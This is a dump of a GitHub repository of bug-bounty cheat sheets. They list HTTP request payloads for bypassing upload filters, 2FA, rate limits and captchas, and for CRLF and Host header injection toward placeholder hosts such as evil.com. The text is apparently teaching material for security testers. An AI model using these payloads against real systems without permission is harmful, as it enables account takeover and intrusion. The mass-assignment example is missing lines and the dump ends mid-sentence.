├── .gitignore ├── CompleteBugBounty ├── Arbitrary File Upload.md ├── Business Logic Errors.md ├── Bypass │ ├── Bypass 2FA.md │ ├── Bypass 304.md │ ├── Bypass 403.md │ ├── Bypass 429.md │ ├── Bypass CSRF.md │ └── Bypass Captcha.md ├── CRLF Injection.md ├── Checklist │ └── Forgot Password.md ├── Cross Site Request Forgery.md ├── Cross Site Scripting.md ├── Denial Of Service.md ├── Exposed Source Code.md ├── Host Header Injection.md ├── Insecure Direct Object References.md ├── Local File Inclusion.md ├── Mass Assignment.md ├── Misc │ ├── Account Takeover.md │ ├── Broken Link Hijacking.md │ ├── Default Credentials │ ├── Email Spoofing.md │ ├── Exposed API keys.md │ ├── JWT Vulnerabilities.md │ └── Tabnabbing.md ├── NoSQL Injection.md ├── OAuth Misconfiguration.md ├── Open Redirect.md ├── README.md ├── Reconnaissance │ ├── Github Dorks.md │ ├── Google Dorks.md │ ├── Scope.md │ └── Shodan Dorks.md ├── Remote File Inclusion.md ├── SQL Injection.md ├── Server Side Request Forgery.md ├── Technologies │ ├── Apache HTTP Server.md │ ├── Confluence.md │ ├── Grafana.md │ ├── HAProxy.md │ ├── Jenkins.md │ ├── Jira.md │ ├── Joomla.md │ ├── Laravel.md │ ├── Moodle.md │ ├── Nginx.md │ ├── WordPress.md │ └── Zend.md └── Web Cache Poisoning.md ├── LICENSE ├── README.md ├── code-of-conduct.md ├── contributing.md ├── cross-site-request-forgery └── xss-payload-list │ ├── Intruder │ └── xss-payload-list.txt │ ├── LICENSE │ └── README.md ├── cross-site-scripting └── xss-payload-list │ ├── Intruder │ └── xss-payload-list.txt │ ├── LICENSE │ └── README.md ├── csv-injection └── csv-injection-payloads │ ├── Intruder │ └── csv-payload.txt │ ├── LICENSE │ └── README.md ├── directory-traversal └── directory-payload-list │ ├── Intruder │ ├── default │ │ ├── big-1.txt │ │ ├── big.txt │ │ ├── common.txt │ │ ├── directory-list-1.0.txt │ │ ├── directory-list-2.3-medium.txt │ │ ├── directory-list-2.3-small.txt │ │ ├── directory-list-lowercase-2.3-medium.txt │ │ ├── 
directory-list-lowercase-2.3-small.txt │ │ └── small.txt │ ├── drupal │ │ ├── drupal_plugins.fuzz.txt │ │ └── drupal_themes.fuzz.txt │ ├── joomla │ │ ├── joomla.txt │ │ ├── joomla_plugins.fuzz.txt │ │ └── joomla_themes.fuzz.txt │ ├── sap │ │ ├── sap.fuzz.txt │ │ ├── sap.txt │ │ ├── sap_common.txt │ │ ├── sap_default.txt │ │ └── sap_icm_paths.txt │ ├── sharepoint │ │ ├── sharepoint-1.txt │ │ ├── sharepoint-2.txt │ │ └── sharepoint.fuzz.txt │ ├── tomcat │ │ ├── apachetomcat.fuzz.txt │ │ ├── tomcat-1.txt │ │ └── tomcat-2.txt │ ├── weblogic │ │ ├── weblogic-1.txt │ │ ├── weblogic-2.txt │ │ └── weblogic.fuzz.txt │ ├── websphere │ │ ├── websphere-1.txt │ │ ├── websphere-2.txt │ │ └── websphere.fuzz.txt │ └── wordpress │ │ ├── wordpress.fuzz.txt │ │ └── wordpress_detector.txt │ ├── LICENSE │ ├── README.md │ └── img │ └── directory-image.jpg ├── file-upload-vulnerabilities ├── How to Exploit File Upload Vulnerabilities (and How to Fix Them!) we45 Blogs.pdf └── file-upload.md ├── http-host-header-injection ├── HTTP-Host-Header-Injection.md └── Host-Header-Attack-Test │ ├── Host-Header-Vulnerability-Detection.py │ ├── LICENSE │ ├── README.md │ ├── crawler.py │ ├── mycrawler.txt │ ├── requirements.txt │ ├── results │ └── New Text Document.txt │ └── sitepath.txt ├── jwt-authentication └── json-web-tokens-introduction │ ├── CONTRIBUTING.md │ ├── LICENSE │ ├── Procfile │ ├── README-zh_CN.md │ ├── README.md │ ├── example │ ├── lib │ │ └── helpers.js │ ├── server.js │ ├── test │ │ ├── functional.js │ │ ├── integration.js │ │ └── mock.js │ └── views │ │ ├── fail.html │ │ ├── index.html │ │ └── restricted.html │ └── package.json ├── local-remote-file-inclusion └── rfi-lfi-payload-list │ ├── LICENSE │ ├── README.md │ └── img │ └── rfi-lfi.jpeg ├── oauth-authentication └── learn-json-web-tokens-master │ ├── README.md │ ├── api │ ├── jsconfig.json │ ├── nodemon.json │ ├── package-lock.json │ ├── package.json │ └── src │ │ ├── index.js │ │ ├── modules │ │ ├── common │ │ │ └── errors.js 
│ │ ├── note │ │ │ ├── index.js │ │ │ ├── model.js │ │ │ ├── mutation │ │ │ │ ├── index.js │ │ │ │ ├── remove.js │ │ │ │ └── save.js │ │ │ └── query │ │ │ │ ├── index.js │ │ │ │ └── list.js │ │ └── user │ │ │ ├── index.js │ │ │ ├── model.js │ │ │ ├── mutation │ │ │ ├── authorize │ │ │ │ ├── azure.js │ │ │ │ ├── bitbucket.js │ │ │ │ ├── digitalocean.js │ │ │ │ ├── discord.js │ │ │ │ ├── facebook.js │ │ │ │ ├── github.js │ │ │ │ ├── gitlab.js │ │ │ │ ├── google.js │ │ │ │ ├── index.js │ │ │ │ ├── instagram.js │ │ │ │ ├── linkedin.js │ │ │ │ ├── reddit.js │ │ │ │ ├── shopify.js │ │ │ │ ├── spotify.js │ │ │ │ ├── twitter.js │ │ │ │ └── zoom.js │ │ │ └── index.js │ │ │ └── query │ │ │ ├── authResponse.js │ │ │ ├── index.js │ │ │ └── profile.js │ │ └── setup │ │ ├── config │ │ ├── env.js │ │ └── params.js │ │ ├── helpers │ │ ├── utils.js │ │ └── validation.js │ │ └── server │ │ ├── authentication.js │ │ ├── database.js │ │ ├── endpoint.js │ │ ├── middlewares.js │ │ ├── modules.js │ │ └── start.js │ └── web │ ├── jsconfig.json │ ├── package-lock.json │ ├── package.json │ ├── public │ ├── favicon.ico │ ├── images │ │ ├── loader.gif │ │ ├── other │ │ │ ├── shopify.svg │ │ │ └── spotify.svg │ │ ├── preview.png │ │ ├── social │ │ │ ├── discord.svg │ │ │ ├── facebook.svg │ │ │ ├── google.svg │ │ │ ├── instagram.svg │ │ │ ├── linkedin.svg │ │ │ ├── reddit.svg │ │ │ ├── twitter.svg │ │ │ └── zoom.svg │ │ └── tech │ │ │ ├── azure.svg │ │ │ ├── bitbucket.svg │ │ │ ├── digitalocean.svg │ │ │ ├── github.svg │ │ │ └── gitlab.svg │ ├── index.html │ ├── logo192.png │ ├── logo512.png │ ├── manifest.json │ └── robots.txt │ └── src │ ├── index.js │ ├── modules │ ├── common │ │ ├── AuthCheck │ │ │ └── index.js │ │ ├── Footer │ │ │ ├── index.js │ │ │ └── style.css │ │ ├── Header │ │ │ ├── index.js │ │ │ └── style.css │ │ ├── Layout │ │ │ ├── index.js │ │ │ └── style.css │ │ └── RoutePrivate │ │ │ └── index.js │ ├── note │ │ ├── List │ │ │ ├── index.js │ │ │ └── style.css │ │ └── api │ │ │ 
└── actions │ │ │ ├── mutation │ │ │ ├── index.js │ │ │ ├── remove.js │ │ │ └── save.js │ │ │ └── query │ │ │ ├── index.js │ │ │ └── list.js │ ├── pages │ │ ├── Authorize │ │ │ ├── index.js │ │ │ └── style.css │ │ └── Home │ │ │ ├── index.js │ │ │ └── style.css │ └── user │ │ ├── Dashboard │ │ ├── index.js │ │ └── style.css │ │ ├── Profile │ │ ├── index.js │ │ └── style.css │ │ └── api │ │ ├── actions │ │ ├── mutation │ │ │ ├── authorize.js │ │ │ └── index.js │ │ ├── query │ │ │ ├── index.js │ │ │ ├── loginSetUser.js │ │ │ ├── loginSetUserLocalStorage.js │ │ │ ├── logout.js │ │ │ ├── logoutUnsetUserLocalStorage.js │ │ │ └── profile.js │ │ └── types.js │ │ └── state │ │ ├── auth.js │ │ └── index.js │ ├── serviceWorker.js │ ├── setup │ ├── config │ │ ├── env.js │ │ └── params.js │ ├── oauth │ │ ├── azure.js │ │ ├── bitbucket.js │ │ ├── digitalocean.js │ │ ├── discord.js │ │ ├── facebook.js │ │ ├── github.js │ │ ├── gitlab.js │ │ ├── google.js │ │ ├── instagram.js │ │ ├── linkedin.js │ │ ├── reddit.js │ │ ├── shopify.js │ │ ├── spotify.js │ │ ├── twitter.js │ │ └── zoom.js │ ├── routes.js │ └── store.js │ └── ui │ ├── Button │ ├── index.js │ └── style.css │ ├── Input │ ├── index.js │ └── style.css │ └── common │ ├── colors.css │ └── reset.css ├── open-redirect └── open-redirect-payload-list │ ├── LICENSE │ └── README.md ├── os-command-injection └── command-injection-payload-list │ ├── LICENSE │ └── README.md ├── server-side-request-forgery └── ssti-payloads │ ├── Intruder │ └── ssti-payloads.txt │ ├── LICENSE │ └── README.md ├── sql-injection └── sql-injection-payload-list │ ├── Image │ └── sql-injection.svg │ ├── Intruder │ ├── detect │ │ ├── GenericBlind.txt │ │ ├── Generic_ErrorBased.txt │ │ ├── Generic_SQLI.txt │ │ ├── Generic_TimeBased.txt │ │ ├── Generic_UnionSelect.txt │ │ ├── MSSQL │ │ │ ├── MSSQL.txt │ │ │ └── MSSQL_blind.txt │ │ ├── MySQL │ │ │ ├── MySQL.txt │ │ │ └── MySQL_MSSQL.txt │ │ ├── NoSQL │ │ │ └── no-sql.txt │ │ ├── Oracle │ │ │ └── oracle.txt │ │ 
└── xPlatform │ │ │ └── xplatform.txt │ ├── exploit │ │ ├── Auth_Bypass.txt │ │ ├── DB2 │ │ │ └── db2-enumeration.txt │ │ ├── MSSQL │ │ │ └── ms-sql-enumeration.txt │ │ ├── MySQL │ │ │ ├── mysql-injection-login-bypass.txt │ │ │ └── mysql-read-local-files.txt │ │ └── PostgresSQL │ │ │ └── postgres-enumeration.txt │ └── payloads-sql-blind │ │ ├── MSSQL │ │ ├── payloads-sql-blind-MSSQL-INSERT.txt │ │ └── payloads-sql-blind-MSSQL-WHERE.txt │ │ └── MySQL │ │ ├── payloads-sql-blind-MySQL-INSERT.txt │ │ ├── payloads-sql-blind-MySQL-ORDER_BY.txt │ │ └── payloads-sql-blind-MySQL-WHERE.txt │ ├── LICENSE │ └── README.md └── xml-external-entity-xxe-injection └── xxe-injection-payload-list ├── Image └── xxe-injection.jpg ├── Intruder └── xxe-injection-payload-list.txt.txt ├── LICENSE └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Compiled Object files 5 | *.slo 6 | *.lo 7 | *.o 8 | *.obj 9 | 10 | # Precompiled Headers 11 | *.gch 12 | *.pch 13 | 14 | # Compiled Dynamic libraries 15 | *.so 16 | *.dylib 17 | *.dll 18 | 19 | # Fortran module files 20 | *.mod 21 | *.smod 22 | 23 | # Compiled Static libraries 24 | *.lai 25 | *.la 26 | *.a 27 | *.lib 28 | 29 | # Executables 30 | *.exe 31 | *.out 32 | *.app 33 | -------------------------------------------------------------------------------- /CompleteBugBounty/Arbitrary File Upload.md: -------------------------------------------------------------------------------- 1 | # Arbitrary File Upload 2 | 3 | ## Introduction 4 | An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server. 5 | 6 | ## Where to find 7 | In upload file feature, for example upload photo profile feature 8 | 9 | ## How to exploit 10 | 1. Change the `Content-Type` value 11 | ``` 12 | POST /images/upload/ HTTP/1.1 13 | Host: target.com 14 | ... 
15 | 16 | ---------------------------829348923824 17 | Content-Disposition: form-data; name="uploaded"; filename="dapos.php" 18 | Content-Type: application/x-php 19 | ``` 20 | Change the Content-Type 21 | ``` 22 | POST /images/upload/ HTTP/1.1 23 | Host: target.com 24 | ... 25 | 26 | ---------------------------829348923824 27 | Content-Disposition: form-data; name="uploaded"; filename="dapos.php" 28 | Content-Type: image/jpeg 29 | ``` 30 | 31 | 2. Try to change the extension when sending the request; for example, here you cannot upload a file with the php extension but you can upload a jpg file 32 | ``` 33 | POST /images/upload/ HTTP/1.1 34 | Host: target.com 35 | ... 36 | 37 | ---------------------------829348923824 38 | Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg" 39 | Content-Type: application/x-php 40 | ``` 41 | Change the request to this 42 | ``` 43 | POST /images/upload/ HTTP/1.1 44 | Host: target.com 45 | ... 46 | 47 | ---------------------------829348923824 48 | Content-Disposition: form-data; name="uploaded"; filename="dapos.php" 49 | Content-Type: application/x-php 50 | ``` 51 | 52 | 3. Upload the payload, but start it with GIF89a; 53 | ``` 54 | POST /images/upload/ HTTP/1.1 55 | Host: target.com 56 | ... 57 | 58 | ---------------------------829348923824 59 | Content-Disposition: form-data; name="uploaded"; filename="dapos.php" 60 | Content-Type: image/gif 61 | 62 | GIF89a; 63 | ``` 64 | And don't forget to change the Content-Type to image/gif 65 | 66 | 4. Bypass content-length validation; it can be bypassed using a small payload 67 | ``` 68 | () 69 | ``` 70 | 71 | 5. Use a null byte in the filename 72 | ``` 73 | file.php%00.gif 74 | ``` 75 | 76 | 6. Use double extensions for the uploaded file 77 | ``` 78 | file.jpg.php 79 | ``` 80 | 81 | 7. Upload with a less common PHP extension (php4, php5, php6, phtml) 82 | ``` 83 | file.php5 84 | ``` 85 | 86 | 8. Try randomly capitalizing the file extension 87 | ``` 88 | file.pHP5 89 | ``` 90 | 91 | 9.
Mix the tips! 92 | -------------------------------------------------------------------------------- /CompleteBugBounty/Bypass/Bypass 2FA.md: -------------------------------------------------------------------------------- 1 | # Bypass Two-Factor Authentication 2 | 3 | 1. Response manipulation 4 | 5 | The response is 6 | ``` 7 | HTTP/1.1 404 Not Found 8 | ... 9 | {"code": false} 10 | ``` 11 | Try this to bypass 12 | ``` 13 | HTTP/1.1 404 Not Found 14 | ... 15 | {"code": true} 16 | ``` 17 | 18 | 2. Status code manipulation 19 | 20 | The response is 21 | ``` 22 | HTTP/1.1 404 Not Found 23 | ... 24 | {"code": false} 25 | ``` 26 | Try this to bypass 27 | ``` 28 | HTTP/1.1 200 OK 29 | ... 30 | {"code": false} 31 | ``` 32 | 33 | 3. 2FA Code in Response 34 | 35 | Always check the response! 36 | ``` 37 | POST /req-2fa/ 38 | Host: vuln.com 39 | ... 40 | email=victim@gmail.com 41 | ``` 42 | The response is 43 | ``` 44 | HTTP/1.1 200 OK 45 | ... 46 | {"email": "victim@gmail.com", "code": "101010"} 47 | ``` 48 | 49 | 4. JS files may contain info about the 2FA code (rare case) 50 | 51 | 5. Bruteforce the 2FA code 52 | 53 | 6. Missing 2FA code integrity validation: a code issued for any user account can be used 54 | ``` 55 | POST /2fa/ 56 | Host: vuln.com 57 | ... 58 | email=attacker@gmail.com&code=382923 59 | ``` 60 | ``` 61 | POST /2fa/ 62 | Host: vuln.com 63 | ... 64 | email=victim@gmail.com&code=382923 65 | ``` 66 | 67 | 7. No CSRF protection on disabling 2FA, and there is also no authentication confirmation. 68 | 69 | 8. 2FA gets disabled on password change/email change. 70 | 71 | 9. Clickjacking on the 2FA disabling page, by iframing the 2FA disabling page and luring the victim into disabling 2FA. 72 | 73 | 10. Enabling 2FA doesn't expire previously active sessions, which is exploitable if the session is already hijacked and there is a session timeout vulnerability. 74 | 75 | 11. 2FA code reusability: the same code can be reused. 76 | 77 | 12. Enter code 000000 78 | ``` 79 | POST /2fa/ 80 | Host: vuln.com 81 | ...
82 | code=00000 83 | ``` 84 | 85 | 13. Enter code "null" 86 | ``` 87 | POST /2fa/ 88 | Host: vuln.com 89 | ... 90 | code=null 91 | ``` 92 | 93 | ## References 94 | * [Harsh Bothra](https://twitter.com/harshbothra_) 95 | * Other writeup -------------------------------------------------------------------------------- /CompleteBugBounty/Bypass/Bypass 304.md: -------------------------------------------------------------------------------- 1 | # Bypass 304 (Not Modified) 2 | 3 | 1. Delete the "If-None-Match" header 4 | ``` 5 | GET /admin HTTP/1.1 6 | Host: target.com 7 | If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" 8 | ``` 9 | Try this to bypass 10 | ``` 11 | GET /admin HTTP/1.1 12 | Host: target.com 13 | ``` 14 | 15 | 2. Adding a random character at the end of the "If-None-Match" header 16 | ``` 17 | GET /admin HTTP/1.1 18 | Host: target.com 19 | If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" 20 | ``` 21 | Try this to bypass 22 | ``` 23 | GET /admin HTTP/1.1 24 | Host: target.com 25 | Host: target.com 26 | If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" b 27 | ``` 28 | 29 | ## References 30 | * [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521) 31 | -------------------------------------------------------------------------------- /CompleteBugBounty/Bypass/Bypass 403.md: -------------------------------------------------------------------------------- 1 | # Bypass 403 (Forbidden) 2 | 3 | 1. Using the "X-Original-URL" header 4 | ``` 5 | GET /admin HTTP/1.1 6 | Host: target.com 7 | ``` 8 | Try this to bypass 9 | ``` 10 | GET /anything HTTP/1.1 11 | Host: target.com 12 | X-Original-URL: /admin 13 | ``` 14 | 15 | 2. Appending **%2e** after the first slash 16 | ``` 17 | http://target.com/admin => 403 18 | ``` 19 | Try this to bypass 20 | ``` 21 | http://target.com/%2e/admin => 200 22 | ``` 23 | 24 | 3. Try adding a dot (.),
slash (/) or semicolon (;) to the URL 25 | ``` 26 | http://target.com/admin => 403 27 | ``` 28 | Try this to bypass 29 | ``` 30 | http://target.com/secret/. => 200 31 | http://target.com//secret// => 200 32 | http://target.com/./secret/.. => 200 33 | http://target.com/;/secret => 200 34 | http://target.com/.;/secret => 200 35 | http://target.com//;//secret => 200 36 | ``` 37 | 38 | 4. Add "..;/" after the directory name 39 | ``` 40 | http://target.com/admin 41 | ``` 42 | Try this to bypass 43 | ``` 44 | http://target.com/admin..;/ 45 | ``` 46 | 47 | 48 | 5. Try uppercasing some letters in the URL 49 | ``` 50 | http://target.com/admin 51 | ``` 52 | Try this to bypass 53 | ``` 54 | http://target.com/aDmIN 55 | ``` 56 | 57 | 6. Via Web Cache Poisoning 58 | ``` 59 | GET /anything HTTP/1.1 60 | Host: victim.com 61 | X-Original-URL: /admin 62 | ``` 63 | 64 | ## Tools 65 | * [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403) 66 | 67 | ## References 68 | - [@iam_j0ker](https://twitter.com/iam_j0ker) 69 | - [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web) 70 | -------------------------------------------------------------------------------- /CompleteBugBounty/Bypass/Bypass 429.md: -------------------------------------------------------------------------------- 1 | # Bypass 429 (Too Many Requests) 2 | 3 | 1. Try adding some custom headers 4 | ``` 5 | X-Forwarded-For : 127.0.0.1 6 | X-Forwarded-Host : 127.0.0.1 7 | X-Client-IP : 127.0.0.1 8 | X-Remote-IP : 127.0.0.1 9 | X-Remote-Addr : 127.0.0.1 10 | X-Host : 127.0.0.1 11 | ``` 12 | For example: 13 | ``` 14 | POST /ForgotPass.php HTTP/1.1 15 | Host: target.com 16 | X-Forwarded-For : 127.0.0.1 17 | ... 18 | 19 | email=victim@gmail.com 20 | ``` 21 | 22 | 2. Adding a null byte ( %00 ) or CRLF ( %09, %0d, %0a ) at the end of the email can bypass the rate limit. 23 | ``` 24 | POST /ForgotPass.php HTTP/1.1 25 | Host: target.com 26 | ...
27 | 28 | email=victim@gmail.com%00 29 | ``` 30 | 31 | 3. Try changing the user agent, cookies and IP address 32 | ``` 33 | POST /ForgotPass.php HTTP/1.1 34 | Host: target.com 35 | Cookie: xxxxxxxxxx 36 | ... 37 | 38 | email=victim@gmail.com 39 | ``` 40 | Try this to bypass 41 | ``` 42 | POST /ForgotPass.php HTTP/1.1 43 | Host: target.com 44 | Cookie: aaaaaaaaaaaaa 45 | ... 46 | 47 | email=victim@gmail.com 48 | ``` 49 | 50 | 4. Add a random query parameter to the endpoint 51 | ``` 52 | POST /ForgotPass.php HTTP/1.1 53 | Host: target.com 54 | ... 55 | 56 | email=victim@gmail.com 57 | ``` 58 | Try this to bypass 59 | ``` 60 | POST /ForgotPass.php?random HTTP/1.1 61 | Host: target.com 62 | ... 63 | 64 | email=victim@gmail.com 65 | ``` 66 | 67 | 5. Add a space after the parameter value 68 | ``` 69 | POST /api/forgotpass HTTP/1.1 70 | Host: target.com 71 | ... 72 | 73 | {"email":"victim@gmail.com"} 74 | ``` 75 | Try this to bypass 76 | ``` 77 | POST /api/forgotpass HTTP/1.1 78 | Host: target.com 79 | ... 80 | 81 | {"email":"victim@gmail.com "} 82 | ``` 83 | 84 | ## References 85 | * [Huzaifa Tahir](https://huzaifa-tahir.medium.com/methods-to-bypass-rate-limit-5185e6c67ecd) 86 | * [Gupta Bless](https://gupta-bless.medium.com/rate-limiting-and-its-bypassing-5146743b16be) -------------------------------------------------------------------------------- /CompleteBugBounty/Bypass/Bypass Captcha.md: -------------------------------------------------------------------------------- 1 | # Bypass Captcha (Google reCAPTCHA) 2 | 3 | 1. Try changing the request method, for example POST to GET 4 | ``` 5 | POST / HTTP 1.1 6 | Host: target.com 7 | ... 8 | 9 | _RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 10 | ``` 11 | 12 | Change the method to GET 13 | ``` 14 | GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1 15 | Host: target.com 16 | ... 17 | ``` 18 | 19 | 2.
Try removing the value of the captcha parameter 20 | ``` 21 | POST / HTTP 1.1 22 | Host: target.com 23 | ... 24 | 25 | _RequestVerificationToken=&_Username=daffa&_Password=test123 26 | ``` 27 | 28 | 3. Try reusing an old captcha token 29 | ``` 30 | POST / HTTP 1.1 31 | Host: target.com 32 | ... 33 | 34 | _RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123 35 | ``` 36 | 37 | 4. Convert JSON data to normal request parameters 38 | ``` 39 | POST / HTTP 1.1 40 | Host: target.com 41 | ... 42 | 43 | {"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"} 44 | ``` 45 | Convert to a normal request 46 | ``` 47 | POST / HTTP 1.1 48 | Host: target.com 49 | ... 50 | 51 | _RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 52 | ``` 53 | 54 | 5. Try custom headers to bypass the captcha 55 | ``` 56 | X-Originating-IP: 127.0.0.1 57 | X-Forwarded-For: 127.0.0.1 58 | X-Remote-IP: 127.0.0.1 59 | X-Remote-Addr: 127.0.0.1 60 | ``` 61 | 62 | 6. Change some specific characters of the captcha parameter and see if it is possible to bypass the restriction. 63 | ``` 64 | POST / HTTP 1.1 65 | Host: target.com 66 | ... 67 | 68 | _RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 69 | ``` 70 | Try this to bypass 71 | ``` 72 | POST / HTTP 1.1 73 | Host: target.com 74 | ... 75 | 76 | _RequestVerificationToken=xxxdxxxaxxcxxx&_Username=daffa&_Password=test123 77 | ``` 78 | -------------------------------------------------------------------------------- /CompleteBugBounty/CRLF Injection.md: -------------------------------------------------------------------------------- 1 | # CRLF Injection 2 | 3 | ## Introduction 4 | A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. 5 | 6 | ## Where to find 7 | It can be found anywhere; always check the request and response.
Try to search for parameters that lead to redirects; the response status will be one of 301, 302, 303, 307 or 308. 8 | 9 | ## How to exploit 10 | 1. Basic payload 11 | ``` 12 | https://example.com/?lang=en%0D%0ALocation:%20https://evil.com/ 13 | ``` 14 | The response is 15 | ``` 16 | HTTP/1.1 200 OK 17 | Content-Type: text/html 18 | Date: Mon, 09 May 2016 14:47:29 GMT 19 | Set-Cookie: language=en 20 | Location: https://evil.com/ 21 | ``` 22 | 23 | 2. Double encode 24 | ``` 25 | https://example.com/?lang=en%250D%250ALocation:%20https://evil.com/ 26 | ``` 27 | 28 | 3. Unicode bypass 29 | ``` 30 | https://example.com/?lang=en%E5%98%8A%E5%98%8DLocation:%20https://evil.com/ 31 | ``` 32 | 33 | ## References 34 | * [@filedescriptor](https://blog.innerht.ml/twitter-crlf-injection/) 35 | * [EdOverflow](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md) -------------------------------------------------------------------------------- /CompleteBugBounty/Exposed Source Code.md: -------------------------------------------------------------------------------- 1 | # Exposed Source Code 2 | 3 | ## Introduction 4 | Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application. 5 | 6 | ## Where to find 7 | `-` 8 | 9 | ## How to exploit 10 | 1. Exposed Git folder 11 | ``` 12 | https://site.com/.git 13 | ``` 14 | ![GIT folder](https://1.bp.blogspot.com/-wTZOuULaqNw/XliI9jS0w3I/AAAAAAAAATA/VZxs7VL5PCY8FdnoKaEjS6AWpcjoJz4MgCLcBGAsYHQ/s1600/1.png) 15 | 16 | Tools to dump .git 17 | * https://github.com/arthaud/git-dumper 18 | 19 | 2.
Exposed Subversion folder 20 | ``` 21 | https://site.com/.svn 22 | ``` 23 | ![SVN folder](https://1.bp.blogspot.com/-5bC_EhFShgk/XliJqiw8pJI/AAAAAAAAATI/2HhrX0Ea3MwQ60Ax2tzNprNvulggPrZAACLcBGAsYHQ/s1600/1.png) 24 | 25 | Tools to dump .svn 26 | * https://github.com/anantshri/svn-extractor 27 | 28 | 3. Exposed Mercurial folder 29 | ``` 30 | https://site.com/.hg 31 | ``` 32 | ![HG folder](https://1.bp.blogspot.com/-4FaqUeTlv4k/XliKHBOpgmI/AAAAAAAAATQ/sLdwhvSF-Jgn0WF5P-PouLp6uTeHUAOWACLcBGAsYHQ/s1600/1.png) 33 | 34 | Tools to dump .hg 35 | * https://github.com/arthaud/hg-dumper 36 | 37 | 4. Exposed Bazaar folder 38 | ``` 39 | http://target.com/.bzr 40 | ``` 41 | ![BZR folder](https://1.bp.blogspot.com/-67WO_kL_iB8/XliKl1jggAI/AAAAAAAAATc/mWBw7igq05EdKR3JZmbXYN4LqjpBOrESgCLcBGAsYHQ/s1600/1.png) 42 | 43 | Tools to dump .bzr 44 | * https://github.com/shpik-kr/bzr_dumper 45 | 46 | 5. Exposed Darcs folder 47 | ``` 48 | http://target.com/_darcs 49 | ``` 50 | 51 | Tools to dump _darcs (Not found) 52 | 53 | 6. Exposed Bitkeeper folder 54 | ``` 55 | http://target.com/Bitkeeper 56 | ``` 57 | 58 | Tools to dump BitKeeper (Not found) 59 | 60 | ## Reference 61 | * [NakanoSec (my own post)](https://www.nakanosec.com/2020/02/exposed-source-code-pada-website.html) 62 | -------------------------------------------------------------------------------- /CompleteBugBounty/Host Header Injection.md: -------------------------------------------------------------------------------- 1 | # Host Header Injection 2 | 3 | ## Introduction 4 | HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks. 
5 | 6 | ## Where to find 7 | In features where the website sends email to us, for example forgot password / newsletter. 8 | 9 | ## How to exploit 10 | 1. Change the host header 11 | ``` 12 | GET /index.php HTTP/1.1 13 | Host: evil-website.com 14 | ... 15 | ``` 16 | 2. Duplicate the host header 17 | ``` 18 | GET /index.php HTTP/1.1 19 | Host: vulnerable-website.com 20 | Host: evil-website.com 21 | ... 22 | ``` 23 | 3. Add line wrapping 24 | ``` 25 | GET /index.php HTTP/1.1 26 | Host: vulnerable-website.com 27 | Host: evil-website.com 28 | ... 29 | ``` 30 | 4. Add host override headers 31 | ``` 32 | X-Forwarded-For: evil-website.com 33 | X-Forwarded-Host: evil-website.com 34 | X-Client-IP: evil-website.com 35 | X-Remote-IP: evil-website.com 36 | X-Remote-Addr: evil-website.com 37 | X-Host: evil-website.com 38 | ``` 39 | How to use it? In this case I'm using "X-Forwarded-For : evil.com" 40 | ``` 41 | GET /index.php HTTP/1.1 42 | Host: vulnerable-website.com 43 | X-Forwarded-For : evil-website.com 44 | ... 45 | ``` 46 | 5. Supply an absolute URL 47 | ``` 48 | GET https://vulnerable-website.com/ HTTP/1.1 49 | Host: evil-website.com 50 | ... 51 | ``` 52 | 53 | ## References 54 | * [PortSwigger](https://portswigger.net/web-security/host-header/exploiting) 55 | -------------------------------------------------------------------------------- /CompleteBugBounty/Mass Assignment.md: -------------------------------------------------------------------------------- 1 | # Mass Assignment Attack 2 | 3 | ## Introduction 4 | Occurs when an app allows a user to manually add parameters to an HTTP request, and the app processes the values of those parameters when handling the request, so that they affect the response returned to the user. Usually occurs in Ruby on Rails / NodeJS 5 | 6 | ## How to exploit 7 | - Normal request 8 | ``` 9 | POST /editdata HTTP/1.1 10 | Host: target.com 11 | ...
19 | 20 | {"status":"success","username":"daffainfo","isAdmin":"false"} 21 | ``` 22 | 23 | - Modified Request 24 | ``` 25 | POST /editdata HTTP/1.1 26 | Host: target.com 27 | ... 28 | 29 | username=daffa&admin=true 30 | ``` 31 | 32 | ``` 33 | HTTP/1.1 200 OK 34 | ... 35 | 36 | {"status":"success","username":"daffainfo","isAdmin":"true"} 37 | ``` 38 | 39 | ## References 40 | * [Pentester Academy](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda) -------------------------------------------------------------------------------- /CompleteBugBounty/Misc/Account Takeover.md: -------------------------------------------------------------------------------- 1 | # Account Takeover 2 | 3 | ## Introduction 4 | Account Takeover (known as ATO) is a type of identity theft where a bad actor gains unauthorized access to an account belonging to someone else. 5 | 6 | ## How to exploit 7 | 1. Using OAuth Misconfiguration 8 | - Victim has an account on evil.com 9 | - Attacker creates an account on evil.com using OAuth. For example, the attacker has a Facebook account registered with the victim's email 10 | - Attacker changes his/her email to the victim's email. 11 | - When the victim tries to create an account on evil.com, it says the email already exists. 12 | 13 | 2. Try re-signing up using the same email 14 | ``` 15 | POST /newaccount HTTP/1.1 16 | ... 17 | email=victim@mail.com&password=1234 18 | ``` 19 | After signing up using the victim's email, try 